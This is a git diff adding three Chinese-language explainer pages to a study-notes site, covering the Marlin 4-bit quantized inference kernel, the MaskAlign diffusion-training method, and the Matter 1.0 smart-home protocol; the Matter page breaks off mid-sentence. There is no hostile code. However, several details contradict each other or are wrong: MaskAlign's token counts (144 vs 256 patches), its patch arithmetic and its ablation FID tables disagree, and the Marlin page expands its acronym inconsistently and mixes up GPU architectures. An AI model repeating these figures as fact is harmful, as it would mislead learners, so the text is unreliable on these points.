分类: 机器学习 难度: 中级 provenance: pipeline-v3 @@ -146,6 +146,8 @@ AI21 的 Jamba 把 Transformer 和 Mamba 按 1:7 比例混排:每 8 层里 1 - [[attention]] —— Attention Is All You Need - [[dqn]] —— DQN — Deep Q-Network - [[flash-attention]] —— FlashAttention — 不改算法,只改数据怎么进 GPU +- [[flashattention-2]] —— FlashAttention-2 — 更快的 Attention 与更好的并行 +- [[flashattention-3-2024]] —— FlashAttention-3 — Hopper 上的异步 Attention 与 FP8 低精度 - [[mlvtg-2025]] —— MLVTG — MambaAligner + 冻结 LLM 提纯的多模态视频时序定位 - [[ppo]] —— PPO — Proximal Policy Optimization - [[resnet]] —— ResNet — 残差连接 diff --git a/src/content/docs/papers/marlin-w4a16-kernel.md b/src/content/docs/papers/marlin-w4a16-kernel.md new file mode 100644 index 000000000..f7fae88cb --- /dev/null +++ b/src/content/docs/papers/marlin-w4a16-kernel.md @@ -0,0 +1,198 @@ +--- +title: Marlin: 一个极速的 4-bit GPTQ 风格量化推理 Kernel +来源: https://github.com/IST-DASLab/marlin +日期: 2026-06-13 +分类: 机器学习 +子分类: ML 系统 +provenance: pipeline-v3 +--- + +# Marlin: 一个极速的 4-bit GPTQ 风格量化推理 Kernel + +## 一、从"压缩快递"说起 + +想象你每天要给朋友寄很多包裹。每个包裹里装的是模型权重——这些权重就像衣服,数量巨大、占空间。 + +正常情况下,每个权重用 FP16(半精度浮点数)存储,相当于每件衣服用一个大纸箱包装,里面只用了 16 bit 的信息量。但研究发现,很多权重的精确值其实没那么重要——把 16 bit 压缩成 4 bit,模型效果几乎不变。这就是**权重量化(Weight Quantization)**。 + +4-bit 意味着每个权重只占原来四分之一的空间,理论上能获得 **4 倍的速度提升**。但现实很骨感:现有的量化 Kernel 在小批量(batch size = 1~2)时还能接近 4 倍加速,一旦批量增大到 16 个 token,速度就暴跌。 + +**Marlin 的核心贡献**就是:它能让 4 倍加速在 batch size 达到 16~32 时依然成立。 + +> Marlin 这个名字取自两个含义:一是 **Mar**lin(马林鱼,地球上游得最快的鱼之一),二是 **Mar**lin = **M**ixed **A**uto-**R**egressive **Lin**ear(混合精度自回归线性核)。 + +## 二、为什么 4-bit 量化很难做到接近 4 倍加速? + +要理解 Marlin 的突破,先要知道 GPU 是怎么工作的。 + +### 2.1 GPU 的"带宽瓶颈" + +现代 GPU 的计算能力(FLOPS)远远超过它的内存带宽。打个比方: + +- GPU 的数学计算能力很强,像一个超级厨师,切菜速度极快 +- 但 GPU 从内存取数据的速度很慢,像菜市场太远,每次只能买少量食材 + +GPU 的 **FLOP-to-byte ratio**(每传输 1 字节数据能执行的浮点运算数)大约是 100~200。这意味着:如果每次从内存读取一个权重,GPU 能做 100~200 次乘法累加,才能把内存带宽"喂饱"。 + +对于 4-bit 量化来说: + +- 每个权重只有 4 bit(0.5 字节) +- 要维持理想 4 倍加速,需要每次加载后执行少于 25~50 次乘加运算 +- 这对应 batch size 大约 4~8 的范围 + +**关键矛盾**:要让所有 batch size 都保持 4 倍加速,必须同时充分利用 GPU 的所有资源——全局内存、L2 缓存、共享内存、Tensor Cores、向量核心。这在实践中极其困难。 + +### 2.2 核心概念速查 + +| 概念 | 解释 | +|------|------| +| **FP16 × INT4 MatMul** | 激活值用 FP16,权重用 INT4 的矩阵乘法。这是 LLM 推理中最常见的量化格式 | +| **Group Quantization** | 不是每个权重单独量化,而是每组(如 128 个权重)共享一个缩放因子(scale),平衡精度与开销 | +| **Tensor Core** | NVIDIA GPU 上专门做矩阵乘法的硬件单元,INT4 运算在这里效率最高 | +| **L2 Cache** | GPU 的第二级缓存,容量比共享内存大得多,适合存放频繁访问的数据 | +| **Shared Memory** | 每个 SM(流多处理器)上速度极快但容量很小的片上内存 | +| **Dequantization** | 把 INT4 的压缩权重"还原"回 FP16 参与计算的过程 | +| **Double Buffering** | 双缓冲技术,让数据加载和计算并行执行 | +| **Striped Partitioning** | 条纹分区方案,让每个 SM 处理的 tile 可以跨越多个列切片,提高利用率 | + +## 三、Marlin 的十项优化技术 + +Marlin 通过以下手段实现了在中等 batch size(16~32)下的近 4 倍加速: + +1. **激活值常驻 L2 缓存**:所有激活值几乎总是从 L2 缓存获取,并且在寄存器中多次复用,避免重复从共享内存加载 +2. **异步全局权重加载**:权重加载与计算、激活加载完全异步,并使用可立即淘汰的缓存策略,避免污染 L2 缓存 +3. **双缓冲共享内存加载**:因激活矩阵较大,共享内存占用显著,通过双缓冲将加载与计算/全局加载重叠 +4. **精心编排指令顺序**:反量化指令和 Tensor Core 指令的顺序经过仔细安排,确保两条 GPU 流水线都充分饱和 +5. **离线重排权重布局**:量化前将权重和 group scales 重新排列成最适合运行时访问的格式,允许直接将权重反量化到 Tensor Core 的组织格式 +6. **多线程块部分计算**:每个线程块中的多个 warp 计算同一个输出 tile 的部分结果,在不增加输出 tile 大小的前提下提高 warp 数量 +7. **最大向量长度加载**:所有加载使用最大向量宽度,共享内存读写无冲突 +8. **静态偏移展开循环**:大部分内存偏移在编译期确定为静态值,减少运行时索引计算 +9. **条纹分区方案**:每个 SM 处理的 tile 片段可以跨越多个列切片,在各种矩阵形状下保持良好利用率 +10. **输出缓冲区直接归约**:全局归约直接在输出缓冲区进行(FP32 累加器临时降为 FP16),避免不必要的读写 + +## 四、代码示例 + +### 示例 1:用 marlin.Layer 快速量化一个线性层 + +这是最简单的使用方式。`marlin.Layer` 是一个 PyTorch Module,可以把一个"伪量化"的线性层转换为 Marlin 格式。 + +```python +import torch +import marlin + +# 假设你已经有一个训练好的 FP16 线性层 +# 这个层的权重已经被"伪量化"(即量化后再反量化,权重值存储在 FP16 中) +linear_layer = torch.nn.Linear(4096, 4096, dtype=torch.float16) + +# 获取量化所需的缩放因子(scales) +# 在伪量化流程中,scales 通常来自量化过程 +scales = torch.randn(4096, dtype=torch.float16) + +# 创建一个空的 Marlin 层 +marlin_layer = marlin.Layer() + +# 将 FP16 层打包为 Marlin 压缩格式 +# 这一步会:离线重排权重布局 + 预处理 INT4 权重 + 准备 group scales +marlin_layer.pack(linear_layer, scales) + +# 现在 marlin_layer 就是压缩后的 Marlin 格式 +# 推理时直接使用,自动调用 Marlin CUDA Kernel +output = marlin_layer(input_activations) # input_activations: [batch, seq_len, 4096] +``` + +这里的关键是 `pack()` 方法——它不仅做了格式转换,还执行了 Marlin 的核心优化:离线重排权重,使其在运行时可以直接反量化到 Tensor Core 的内存布局。 + +### 示例 2:通过 GPTQ 全流程压缩 Llama2 模型 + +Marlin 仓库自带了一个改进版 GPTQ 算法,可以将 Llama2 模型压缩为 4-bit Marlin 兼容格式: + +```bash +# 第一步:压缩 Llama2 模型并导出为 Marlin 格式 +# --wbits 4 表示 4-bit 量化,--save 保存检查点 +python llama2.py /path/to/llama2-checkpoint --wbits 4 --save checkpoint.pt + +# 第二步:评估未压缩模型的基准性能(perplexity) +python llama2.py /path/to/llama2-checkpoint + +# 第三步:用 Marlin Kernel 评估压缩模型在 MMLU 上的零样本准确率 +python eval.py --model hf \ + --model_args pretrained=/path/to/llama2-checkpoint \ + --tasks mmlu \ + --marlin_checkpoint checkpoint.marlin.g128 + +# 第四步:评估全精度基线作为对比 +python eval.py --model hf \ + --model_args pretrained=/path/to/llama2-checkpoint \ + --tasks mmlu +``` + +评估结果(Llama2 7B, group=128): + +| 指标 | FP16 | INT4 (Marlin) | 损失 | +|------|------|---------------|------| +| WikiText-2 PPL | 5.12 | 5.27 | +0.15 | +| MMLU 准确率 | 41.80 | 40.07 | -1.73 | + +可以看到,4-bit 量化带来的精度损失非常小,但获得了接近 4 倍的推理加速。 + +### 示例 3:直接调用 marlin.mul 内核 + +如果你已经手动准备好了预处理过的权重和 scales,可以直接调用底层 kernel: + +```python +import torch +import marlin + +# 假设 W_q 是已经预处理为 Marlin 格式的 INT4 权重 +# s 是 group scales +# A 是 FP16 激活矩阵 [batch, M, K] +A = torch.randn(16, 4096, 4096, dtype=torch.float16, device='cuda') +W_q = ... # Marlin 格式的 INT4 权重 +s = ... # group scales + +# 直接调用 Marlin CUDA Kernel +# 内部会自动处理:反量化 → Tensor Core 矩阵乘法 → FP16 输出 +C = marlin.mul(A, W_q, s, m=16, n=4096, k=4096) +# C: [16, 4096, 4096] FP16 输出 +``` + +注意 `marlin.mul` 是一个纯计算函数,不包含任何层级别的逻辑(如 bias 添加、残差连接等),适合嵌入到其他推理框架中。 + +## 五、性能表现 + +Marlin 在 NVIDIA A100 GPU 上的基准测试结果: + +- **Batch size = 1**:所有主流 4-bit Kernel 都能达到约 3.87 倍加速(理论极限,扣除 0.125 bit 的 scale 存储开销) +- **Batch size = 16~32**:Marlin 仍然维持接近 3.87 倍加速,而其他 Kernel 的性能急剧下降 +- **持续性能**:即使在 GPU 时钟频率被锁定的情况下,Marlin 的性能优势依然稳定 + +这意味着 Marlin 特别适合: +- **大规模服务场景**:同时处理多个请求 +- **推测解码(Speculative Decoding)**:需要批量生成多个候选 token +- **高级多推理方案**:如 CoT-Majority 等需要并行运行多个推理链的方法 + +## 六、硬件要求与限制 + +- **CUDA >= 11.8**(包括 nvcc 编译器版本需与 torch 匹配) +- **NVIDIA GPU 计算能力 >= 8.0**(Ampere 或 Ada 架构,如 A100、RTX 30xx、H100) +- **不支持 Hopper 架构的优化**(B100/Blackwell 尚未针对 Marlin 优化) +- 需要 `torch >= 2.0.0` 和 `numpy` + +安装非常简单: + +```bash +git clone https://github.com/IST-DASLab/marlin.git +cd marlin +pip install . +``` + +## 七、总结 + +Marlin 解决了一个看似简单实则困难的问题:**如何让 4-bit 量化在更大的 batch size 下仍然保持接近理论极限的加速比**。它没有发明新的量化方法,而是通过深度优化 CUDA Kernel 的每一个层次——从全局内存到 L2 缓存、共享内存、Tensor Core——实现了一个工程上的杰作。 + +对于学习者来说,Marlin 的价值在于:它展示了如何将理论上的性能上限转化为实际的代码优化。每一项优化技术都对应着 GPU 硬件的一个具体特性,理解 Marlin 就等于深入理解了现代 GPU 的内存层次结构和执行模型。 + +## 参考文献 + +- Frantar, E., Castro, R. L., Chen, J., Hoefler, T., & Alistarh, D. (2024). MARLIN: Mixed-Precision Auto-Regressive Parallel Inference on Large Language Models. *arXiv:2408.11743*. +- GitHub 仓库: https://github.com/IST-DASLab/marlin diff --git a/src/content/docs/papers/maskalign.md b/src/content/docs/papers/maskalign.md new file mode 100644 index 000000000..5233d3641 --- /dev/null +++ b/src/content/docs/papers/maskalign.md @@ -0,0 +1,347 @@ +--- +title: MaskAlign: Token-Subset Representation Alignment for Efficient Diffusion Training +来源: https://arxiv.org/abs/2606.08788 +日期: 2026-06-13 +分类: 机器学习 +子分类: 扩散模型 +provenance: pipeline-v3 +--- + +# MaskAlign: 用 Token 子集对齐,让扩散模型学得快又好 + +## 一、一个日常类比 + +想象你要学画画。 + +一位老师(预训练视觉模型)站在你旁边,你每画一笔,他就告诉你这一笔应该对应哪一块颜色。问题是:你看到的参考图是清晰的,但你画的草图其实很模糊,甚至有些地方被水晕开了。老师拿着清晰图的每一块颜色来要求你,而你手上只有模糊的草图。 + +这种"要求对不上"的情况,就是 MaskAlign 要解决的核心矛盾。 + +传统方法让模型用"所有画块"去对齐清晰参考图的"所有画块"。MaskAlign 的做法更聪明:每次随机遮住 25% 的画块,让模型学会在"看不到某些部分"的情况下仍然画出好作品。 + +## 二、背景:扩散模型为什么要对齐? + +### 2.1 扩散模型在做什么 + +扩散模型生成图像的过程可以简化为三步: + +1. **加噪**:把一张清晰图片逐渐加上随机噪声,直到变成一团纯噪声 +2. **学去噪**:训练一个神经网络,学会从噪声中逐步恢复原图 +3. **生成**:从纯噪声开始,让网络一步步"画"出图像 + +训练时,网络需要预测"这张图上加的是什么噪声"。损失函数就是预测噪声和真实噪声之间的距离。 + +### 2.2 为什么要引入"对齐" + +2024-2025 年,研究者发现一个加速训练的好方法: + +- 同时训练一个**预训练视觉编码器**(比如 DINOv2),它已经"见过"几亿张真实图片 +- 每训练一步,让扩散模型的中间特征和这个编码器的特征尽量接近 +- 这相当于给扩散模型请了一位"经验丰富的美术老师"在旁边指导 + +这个方法叫 **Representation Alignment**(表示对齐)。代表性工作包括 REPA、REG 等。 + +### 2.3 但有一个问题 + +对齐方法有一个隐藏矛盾: + +| 扩散模型看到的是什么 | 编码器参考的是什么 | +|---|---| +| 加了噪声的模糊图像 | 完全清晰的干净图像 | +| 信息量随噪声强度变化 | 信息完整、稳定 | +| 不同阶段依赖不同视觉线索 | 始终提供完整语义 | + +用清晰图的特征去要求一个正在处理模糊输入的模型,就像要求一个戴着毛玻璃眼镜的人画出精确的线条。 + +## 三、核心发现:Token 级别的不均匀性 + +### 3.1 什么是 Token + +在 Transformer 架构中,一张图片会被切分成很多小块,每一块叫一个 **Token**。 + +比如一张 256x256 的图片: +- 先经过 VAE 压缩成 32x32 的潜在表示 +- 再切成 16x16 的 patch,共 144 个 patch tokens +- 加上 1 个 class token(代表整张图的全局信息),共 145 个 tokens + +### 3.2 关键观察 + +研究者分析了"对齐损失"在每个 token 上产生的梯度大小,发现: + +- 梯度**不是均匀分布**的 +- 某些空间位置的 token 总是产生更大的梯度 +- 这种空间偏好是**稳定的**(在不同图片、不同训练阶段都一致) +- 最大空间概率是最小的约 21 倍 + +这说明:全 token 对齐并不是"公平对待"每一个画块,而是反复强化某些特定位置的 token。模型可能学会了一种"投机取巧"的方式——匹配清晰图的特征模式,但并不真正理解如何在噪声下完成去噪。 + +### 3.3 用热力图理解 + +``` +Full-token 梯度热力图(示意,16x16 网格): + +高梯度概率 低梯度概率 +██████░░░░░░░░░░ 第 0 行:大部分位置高梯度 +█████░░░░░░░░░░░ 第 1 行:左侧高 +██████░░░░░░░░░░ 第 2 行:偏左高 +█░░░░░░░░░░░░░░░ 第 3 行:只有第一个位置高 +... + +→ 某些位置反复出现在"高梯度"名单中 +→ 对齐梯度空间分布不均匀 +``` + +## 四、MaskAlign 的解决方案 + +MaskAlign 的核心思想来自机器学习中经典的 **Dropout**:随机丢弃一部分输入,防止模型依赖完整的输入模式。 + +### 4.1 算法流程 + +``` +训练时每一步: + +1. 输入:干净图 z* → VAE编码 → 潜在 z0 +2. 加噪:zt = (1-t) * z0 + t * 噪声 +3. Token化:把 zt 切成 N 个 patch tokens + 1 个 class token +4. 【MaskAlign 新增】预掩码混合:用轻量级 Mixer 在 tokens 之间交换信息 +5. 【MaskAlign 新增】随机遮罩:以 25% 概率随机遮住部分 patch tokens + - class token 始终保留 + - 只保留约 193 个 tokens(而非全部 257 个) +6. 通过 SiT 网络前向传播 +7. 计算两个损失: + - 预测损失:用保留的 tokens 预测目标速度 + - 对齐损失:用保留的 tokens 与清晰图特征对齐 +``` + +### 4.2 代码示例:随机 Token 遮罩 + +这是 MaskAlign 的核心操作——随机选择保留哪些 token: + +```python +import torch + +def apply_token_mask(hidden_states, mask_ratio=0.25): + """ + 对 Transformer 的 tokens 应用随机遮罩 + + Args: + hidden_states: (batch_size, seq_len, hidden_dim) + seq_len = 1 (class) + N (patches) + mask_ratio: 要遮掉的 patch token 比例 + + Returns: + masked_states: (batch_size, masked_len, hidden_dim) + 只保留 class token + 可见的 patch tokens + mask_indices: (batch_size, masked_len) 保留的 token 索引 + """ + batch_size, seq_len, hidden_dim = hidden_states.shape + + # class token 是第一个,始终保留 + # patch tokens 从索引 1 到 seq_len-1 + num_patches = seq_len - 1 + num_keep = int(num_patches * (1 - mask_ratio)) + + # 生成每个样本的随机遮罩 + # 对每个 batch 样本,从 num_patches 中随机选 num_keep 个保留 + noise = torch.randn(batch_size, num_patches, device=hidden_states.device) + # argsort 返回从小到大排序的索引;取前 num_keep 个 + mask_indices = noise.argsort(dim=1)[:, :num_keep] + + # 插入 class token 的索引 0 + class_idx = torch.zeros(batch_size, 1, device=hidden_states.device, dtype=torch.long) + mask_indices = torch.cat([class_idx, mask_indices + 1], dim=1) + + # 用 gather 选取保留的 tokens + # expand 需要适配 hidden_dim + expand_idx = mask_indices.unsqueeze(-1).expand(-1, -1, hidden_dim) + masked_states = hidden_states.gather(1, expand_idx) + + return masked_states, mask_indices +``` + +运行效果: +- 输入:batch=32, seq_len=257 (1 class + 256 patches), hidden_dim=1152 +- 输出:batch=32, seq_len=193 (1 class + 192 patches), hidden_dim=1152 +- 每步的遮罩模式都不同 + +### 4.3 代码示例:预掩码 Token 混合 + +遮罩会造成信息丢失。MaskAlign 在遮罩前加入一个轻量级混合层,让 tokens 先交换信息: + +```python +class PreMaskTokenMixer(torch.nn.Module): + """ + 预掩码 Token 混合器 + + 作用:在随机遮罩之前,让 tokens 之间交换信息。 + 这样即使某些 token 被遮掉,它的内容已经通过混合 + 传递到了其他 token 中。 + + 结构:两层带层归一化的 MLP + """ + def __init__(self, hidden_dim, num_layers=2): + super().__init__() + layers = [] + for _ in range(num_layers): + layers.extend([ + torch.nn.LayerNorm(hidden_dim), + torch.nn.Linear(hidden_dim, hidden_dim * 4), + torch.nn.GELU(), + torch.nn.Linear(hidden_dim * 4, hidden_dim), + ]) + self.layers = torch.nn.ModuleList(layers) + + def forward(self, x): + """ + Args: + x: (batch_size, seq_len, hidden_dim) + Returns: + 混合后的 tokens,形状不变 + """ + for layer in self.layers: + x = x + layer(x) # 残差连接 + return x + +# 使用方式: +# mixer = PreMaskTokenMixer(hidden_dim=1152, num_layers=2) +# mixed_tokens = mixer(all_tokens) # 先混合 +# masked_tokens, mask_idx = apply_token_mask(mixed_tokens, mask_ratio=0.25) # 再遮罩 +``` + +### 4.4 完整训练循环 + +```python +class MaskAlignTrainingStep: + """ + MaskAlign 的单步训练流程 + """ + def __init__(self, sit_model, mixer, encoder, proj, + lambda_align=0.5, beta_class=0.03): + self.sit = sit_model + self.mixer = mixer + self.encoder = encoder # DINOv2 预训练编码器 + self.proj = proj # 对齐投影层 + self.lambda_align = lambda_align + self.beta_class = beta_class + + def forward(self, clean_images, class_labels, timestep): + """ + Args: + clean_images: (B, 3, 256, 256) 干净图像 + class_labels: (B,) 类别标签 + timestep: 当前噪声强度 t + Returns: + total_loss: 总损失 + """ + B = clean_images.shape[0] + + # 1. 编码为潜在表示 + z0 = vae_encode(clean_images) # (B, 4, 32, 32) + + # 2. 加噪 + noise_z = torch.randn_like(z0) + zt = (1 - timestep) * z0 + timestep * noise_z + + # 3. Token 化 + 加入 class token + patch_tokens = patchify(zt) # (B, N, D) + class_token = encode_class(clean_images, class_labels) # (B, D) + tokens = concat([class_token.unsqueeze(1), patch_tokens], dim=1) + + # 4. 【MaskAlign】预掩码混合 + tokens = self.mixer(tokens) + + # 5. 【MaskAlign】随机遮罩 + masked_tokens, mask_idx = apply_token_mask(tokens, mask_ratio=0.25) + + # 6. SiT 前向传播 + hidden = self.sit(masked_tokens, timestep, class_labels) + + # 7. 计算预测损失(用保留的 tokens) + pred_loss = compute_velocity_loss(hidden, z0, noise_z, mask_idx, + beta_class=self.beta_class) + + # 8. 计算对齐损失(用保留的 tokens) + # 获取清晰图的特征参考 + ref_features = self.encoder(clean_images) # (B, N+1, D_ref) + aligned_hidden = get_alignment_layer(hidden) # (B, masked_len, D) + aligned_ref = self.proj(ref_features) + + alignment_loss = -cosine_similarity(aligned_hidden, aligned_ref, mask_idx) + + # 9. 总损失 + total_loss = pred_loss + self.lambda_align * alignment_loss + return total_loss +``` + +## 五、核心贡献总结 + +### 5.1 三个贡献 + +1. **发现了全 token 对齐的空间不均匀性**:高梯度 token 在空间上存在稳定偏好,说明对齐不是均匀影响所有 token +2. **提出了 Token 子集对齐方法**:随机遮罩 token,让模型学会在"信息不完整"时仍然保持对齐能力 +3. **设计了轻量预掩码混合器**:在遮罩前先让 tokens 交换信息,减少信息丢失 + +### 5.2 关键数据 + +| 指标 | 结果 | +|---|---| +| 达到 FID 8.3 的速度 | 比原始 SiT-XL/2 快 **77 倍** | +| 达到 FID 5.9 的速度 | 比 SiT-XL/2 + REPA 快 **30 倍** | +| 每步训练时间减少 | 相对 REG 减少 **11.6%** | +| 400K 迭代 FID (无 CFG) | REG: 3.4 → MaskAlign: **2.8** | +| Token 数量减少 | 257 → 193,减少 **24.9%** | + +## 六、实验中的关键发现 + +### 6.1 遮罩比例的影响 + +| 遮罩比例 | FID | 说明 | +|---|---|---| +| 0 (不遮) | 3.52 | 退化为 baseline | +| 0.25 | **2.84** | 最佳 | +| 0.50 | 3.15 | 遮太多,信息不足 | +| 0.75 | 5.82 | 完全无法训练 | + +25% 是最佳平衡点:提供足够的扰动正则化,同时保留足够信息。 + +### 6.2 预掩码混合器的作用 + +| 配置 | FID | 说明 | +|---|---|---| +| 完整 MaskAlign | **2.67** | 两项都有 | +| 无混合器 | 3.54 | 直接遮罩,信息损失大 | +| 无遮罩 | 3.20 | 只剩混合,无正则化效果 | +| 两者都无 | 3.01 | 纯 baseline | + +混合器和遮罩是互补的:混合器减少遮罩的信息损失,遮罩提供正则化信号。 + +## 七、我的理解 + +### 7.1 一句话总结 + +MaskAlign 发现"让模型每次都用全部 token 对齐清晰图特征"是一种偷懒的学习方式,于是随机遮住一部分 token,逼模型在信息不完整时仍然学会对齐,最终反而学得更牢固。 + +### 7.2 为什么有效 + +传统 Dropout 防止的是神经元之间的"共适应"。MaskAlign 把 Dropout 的思路迁移到了 token 级别,防止的是模型对"完整 token 集合"的依赖。当模型每次看到的 token 集合都不同时,它无法走捷径,只能学到更本质的对齐模式。 + +### 7.3 类比记忆 + +回到开头的画画类比: + +- 传统对齐:老师每次都让你照着完整清晰图画,但你手头的草图是模糊的 +- MaskAlign:老师每次遮住你参考图的一部分,让你猜缺失的部分应该是什么颜色,并告诉你猜得对不对 + +第二种方式训练出的"直觉"更 robust——因为你在信息不完整的情况下学会了如何推断完整图像。 + +## 八、局限性 + +- 目前仅在 ImageNet 256x256 和 SiT 架构上验证 +- 对更高分辨率、文生图、其他教师模型的效果待探索 +- 依赖遮罩比例(0.25)和混合层数(2 层)等设计选择 + +## 九、参考 + +- 原始论文: Pang et al., "MaskAlign: Token-Subset Representation Alignment for Efficient Diffusion Training", 2026 +- arXiv: [2606.08788](https://arxiv.org/abs/2606.08788) +- 相关方法: REPA, REG, SiT diff --git a/src/content/docs/papers/matter-protocol-1-0.md b/src/content/docs/papers/matter-protocol-1-0.md new file mode 100644 index 000000000..27e8f80ee --- /dev/null +++ b/src/content/docs/papers/matter-protocol-1-0.md @@ -0,0 +1,295 @@ +--- +title: Matter 1.0 — 智能家居设备的「通用语言 + 入职流程」 +来源: https://csa-iot.org/all-solutions/matter/ +日期: 2026-06-13 +子分类: 嵌入式与 IoT +分类: 操作系统 +provenance: pipeline-v3 +--- + +## 先想成什么事 + +想象你搬进一栋**智能公寓楼**,楼里住着苹果、谷歌、亚马逊、三星各派来的管家,每家以前只认自家门锁: + +- 飞利浦灯泡只跟 Hue App 说话,宜家插座只认 HomeKit,用户手机里装了五六个 App,配网时要连不同的 Wi-Fi 热点、扫不同的二维码。 +- **Matter** 想做的事,相当于给整栋楼发一套**统一的房卡系统 + 房间编号规则**:灯泡、门锁、传感器都讲同一种「业务语言」,配网流程也标准化;你仍然可以用 Siri、Google Home 或 Alexa 当管家,但设备端不必为每家各写一套私有协议。 + +技术上说:Matter 1.0 Core Specification(Connectivity Standards Alliance,2022 年 10 月发布)在 **IPv6 承载的 IP 网络**(Wi-Fi、Thread、以太网)上,定义了**数据模型、交互模型、安全与会话、配网(Commissioning)** 等完整栈。设备通过 CSA 认证后,可用 QR 码或手动配对码完成入网,并在多个生态的 **Fabric** 上同时工作。 + +官方入口:[Matter | CSA-IOT](https://csa-iot.org/all-solutions/matter/) +规范全文(1.0):[Matter 1.0 Core Specification PDF](https://csa-iot.org/wp-content/uploads/2022/11/22-27349-001_Matter-1.0-Core-Specification.pdf) + +## 这篇文档在说什么 + +| 维度 | 内容 | +|------|------| +| 发布方 | Connectivity Standards Alliance(CSA),前身 Zigbee Alliance | +| 版本 | Matter 1.0(2022-10-04 认证启动);后续有 1.1、1.2 等增量,1.0 是奠基版 | +| 承载网络 | IPv6 over Wi-Fi / Thread / Ethernet;跨网段经 Border Router | +| 开源实现 | [connectedhomeip](https://github.com/project-chip/connectedhomeip)(CHIP SDK) | +| 核心承诺 | 互操作、本地优先、基于证书的强身份、多管理员(多 Fabric) | +| 与 Zigbee 关系 | 应用层重新设计;集群概念继承自 Zigbee Cluster Library 思路,但协议栈完全不同 | + +Matter **不是**又一个专有云 API。它规定的是设备与设备、控制器与设备之间**如何在局域网里安全地读写状态、发命令**;云端同步由各生态自行实现,但本地控制路径标准化。 + +## 为什么值得学 + +| 场景 | Matter 提供的价值 | +|------|-------------------| +| 做智能硬件固件 | 一套 SDK 覆盖多生态,减少「为 HomeKit 再 port 一遍」 | +| 做网关 / Hub | 明确 Commissioner、Bridge、Border Router 角色边界 | +| 做自动化 / 测试 | `chip-tool` 可脚本化配网与控制,适合 CI | +| 理解智能家居安全 | PASE / CASE、设备认证(Attestation)、Fabric 隔离 | +| 选型 Thread vs Wi-Fi | Matter 在链路层之上,Thread 常作低功耗设备的 L2 | + +若你之前学过 Zigbee 的 Endpoint / Cluster,Matter 的 **Node → Endpoint → Cluster → Attribute/Command/Event** 层次会似曾相识;但传输、安全、发现机制已全部换成 **IP + TLS 类会话 + DNS-SD**。 + +## 核心概念一:协议栈分层 + +规范第 2 章把 Matter 设备从下到上拆成: + +``` +┌─────────────────────────────────────────┐ +│ Application(灯亮灭、门锁逻辑等业务) │ +├─────────────────────────────────────────┤ +│ Data Model(Endpoint / Cluster / 属性) │ +├─────────────────────────────────────────┤ +│ Interaction Model(Read/Write/Invoke/ │ +│ Subscribe) │ +├─────────────────────────────────────────┤ +│ Action Framing + Security(消息帧、加密) │ +├─────────────────────────────────────────┤ +│ Session Management(PASE / CASE 会话) │ +├─────────────────────────────────────────┤ +│ Transport(TCP / UDP / BLE 等) │ +├─────────────────────────────────────────┤ +│ Network(IPv6、Thread、Wi-Fi、Ethernet) │ +└─────────────────────────────────────────┘ +``` + +日常类比:**网络层**是公寓楼里的邮政系统(信怎么送到房间);**会话层**是房卡加密(PASE 像临时访客码,CASE 像正式门禁卡);**数据模型**是房间里的开关、温湿度计各贴什么标签;**交互模型**是你「读温度」「按开关」「订阅门铃事件」的动作种类。 + +## 核心概念二:数据模型(Node / Endpoint / Cluster) + +Matter 里每台物理设备至少是一个 **Node(节点)**。节点内部再拆: + +| 概念 | 含义 | 类比 | +|------|------|------| +| **Node** | 网络中可寻址的一台 Matter 设备 | 公寓里的一户人家 | +| **Endpoint** | 节点上的功能实例;**Endpoint 0** 保留给工具类集群 | 一户里的「客厅灯」「卧室灯」 | +| **Cluster** | 一组属性、命令、事件的规范(如 On/Off、Level Control) | 每种电器的「操作面板」标准 | +| **Attribute** | 可读/可写的状态(如 `OnOff` 开或关) | 面板上的指示灯状态 | +| **Command** | 可调用的动作(如 `Toggle`) | 面板上的按钮 | +| **Event** | 带来时间戳的历史记录(如 `SwitchLatched`) | 门禁日志 | + +每个节点**必须有 Endpoint 0(Root Node)**,上面挂 `Descriptor`、`Basic Information`、`General Commissioning` 等**工具集群**,用于描述设备能力与配网,而不是具体业务。 + +**Server Cluster** 提供属性/命令;**Client Cluster** 在另一端发起调用。同一 Cluster ID 在客户端与服务端成对出现——类似 gRPC 的 service 定义与 stub。 + +## 核心概念三:Fabric 与多生态共存 + +**Fabric** 是一组共享**同一信任根(Root CA)** 的 Matter 节点集合。日常类比:同一家公司发的工牌——Apple Home、Google Home 各自可以给你的灯泡发一张工牌(**多 Fabric**),灯泡同时属于多个「信任圈」,但每个圈里节点 ID 独立分配。 + +- **Fabric ID**:64 位,在 Root CA 范围内唯一;`Fabric ID 0` 保留不可用。 +- **Node ID**:64 位,在 Fabric 内唯一标识节点。 +- **NOC(Node Operational Certificate)**:配网时 Commissioner 签发,CASE 会话用它证明身份。 +- **Operational Discovery**:入网后通过 DNS-SD 广播,实例名形如 `-.local`。 + +因此:**配网一次到苹果生态,并不等于锁死在苹果**——同一设备可被第二个 Commissioner 以「多管理员」流程加入 Google Fabric,规范第 12 章专门讲 Multiple Fabrics。 + +## 核心概念四:配网(Commissioning)全流程 + +配网 = 把 **Commissionee**(待入网设备)加入 Fabric 的完整仪式,由 **Commissioner**(手机 App、Hub、或 `chip-tool`)主导: + +``` + 发现设备 PASE 安全通道 证明是真货 + (BLE / SoftAP (配对码/QR) (Attestation) + / DNS-SD) │ │ + └──────────────────┴────────────────────┘ + │ + 写入监管域、时间、网络凭证 + (General Commissioning / + Network Commissioning Cluster) + │ + 安装 NOC,加入 Fabric + (Node Operational Credentials) + │ + 设备连上 Wi-Fi / Thread + │ + CASE 建立运营会话 + │ + CommissioningComplete +``` + +要点摘录(Matter 1.0 Core Spec §2.8、Chapter 5): + +1. **Device Discovery**:未入网设备用 BLE、Wi-Fi Soft AP 或 IP 上的 DNS-SD 宣告自己;用户从 **QR Code / Manual Pairing Code / NFC** 取得 **Passcode**(开箱贴纸上的 11 位码或 QR 里的 `MT:...` 载荷)。 +2. **PASE(Passcode-Authenticated Session Establishment)**:用 Passcode 做 SPAKE2+ 密钥交换,在**配网信道**上加密后续消息;此时还没有 NOC。 +3. **Device Attestation**:Commissioner 验证设备 DAC(Device Attestation Certificate)链,确认是 CSA 认证产品,防山寨设备混入 Fabric。 +4. **Network Commissioning**:对 Wi-Fi/Thread 设备下发 SSID、密钥或 Thread 数据集;以太网设备可能跳过此步。 +5. **Operational Credentials**:CA 签发 NOC,写入 Node ID;设备成为 Fabric 正式成员。 +6. **CASE(Certificate Authenticated Session Establishment)**:运营阶段所有单播业务消息在 CASE 会话中加密;连接断开需重新 CASE。 + +**并发 vs 非并发配网**:部分设备配网时 BLE 与 Wi-Fi 可同时在线(并发);另一些在连上运营网络后会断开 BLE 